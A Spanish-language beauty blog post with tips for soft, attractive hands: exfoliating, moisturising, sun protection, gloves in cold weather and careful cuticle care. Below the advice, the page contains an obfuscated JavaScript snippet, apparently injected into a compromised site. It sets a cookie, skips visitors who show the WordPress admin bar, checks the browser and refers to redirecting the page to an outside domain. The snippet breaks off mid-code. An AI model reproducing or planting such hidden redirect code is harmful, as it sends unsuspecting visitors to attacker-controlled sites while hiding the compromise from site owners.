Muchas personas tanto hombres como mujeres, debido a sus trabajos no pueden lucir unas manos bonitas y suaves como desearían.

Para tener unas manos bonitas, debes seguir los siguientes consejos:

Exfolia tus manos antes de exponer tu piel al sol.

– Hidrátalas con una crema específica de manos y deja actuar. Si vas a exponerte  al sol utiliza una crema con factor solar.

– Cuando salgas de la ducha, utiliza siempre una toalla caliente y seca bien los dedos. Es muy importante que los dedos estén bien secos ya que así evitarás que salgan antiestéticas pieles o descamaciones por la humedad.

– Utiliza siempre, una crema de manos para hidratar tus manos y evitar la sequedad. Procura aplicar la crema todos los días y extiéndela perfectamente hasta su completa absorción.

– El frío, también afecta en exceso a tus manos. Lo mejor, es que intentes protegerlas siempre de los cambios bruscos de temperatura. Aplica cremas y geles adecuados y ¡ponte guantes! Verás cómo tus manos se sentirás más confortables y lucirán más bonitas.

– Si tienes pequeñas heridas o pieles alrededor de tus uñas, no las arranques con las manos o la boca. Procura desinfectar siempre la parte afectada y luego, retira las pieles con ayuda de un instrumento adecuado, que no dañe tus manos ni tus uñas.

¡Seguid estos consejos y veréis como vuestras manos lucen más bonitas y suaves! 😉

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone